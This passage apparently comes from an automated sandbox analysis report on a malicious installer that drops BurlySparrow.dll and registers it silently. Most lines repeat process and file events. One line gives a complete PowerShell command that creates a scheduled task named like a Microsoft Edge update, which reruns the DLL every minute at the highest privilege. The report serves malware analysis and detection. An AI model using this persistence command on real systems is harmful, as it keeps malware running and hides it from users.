Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\BurlySparrow.dll"
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_0264411F push es; iretd 7_2_02644137
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_02639EF5 push ecx; ret 7_2_02639F08
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F975D3 push eax; retn 0000h7_2_04F975DA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F8A5CA push ecx; ret 7_2_04F8A5DD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F947F4 push es; iretd 7_2_04F9480C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_04F8D10D push esp; retf 0040h7_2_04F8D10E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_027336B8 push ebx; iretd 10_2_027336DA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_06F03EAE push dword ptr [eax+eax*2-75h]; iretd 10_2_06F03EB4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_06F0007F push ss; iretd 10_2_06F0009A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_08099B37 push 006ACFEDh; iretd 10_2_08099B62
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_080953E2 push eax; retf 10_2_080953E9
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Local\Temp\is-FHHU1.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Roaming\is-SF7GG.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Local\Temp\is-14VP5.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeFile created: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpJump to dropped file
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeFile created: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Local\is-L5KBT.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Local\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpFile created: C:\Users\user\AppData\Roaming\BurlySparrow.dll (copy)Jump to dropped file

Boot Survival

barindex
Uses Register-ScheduledTask to add task schedules
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
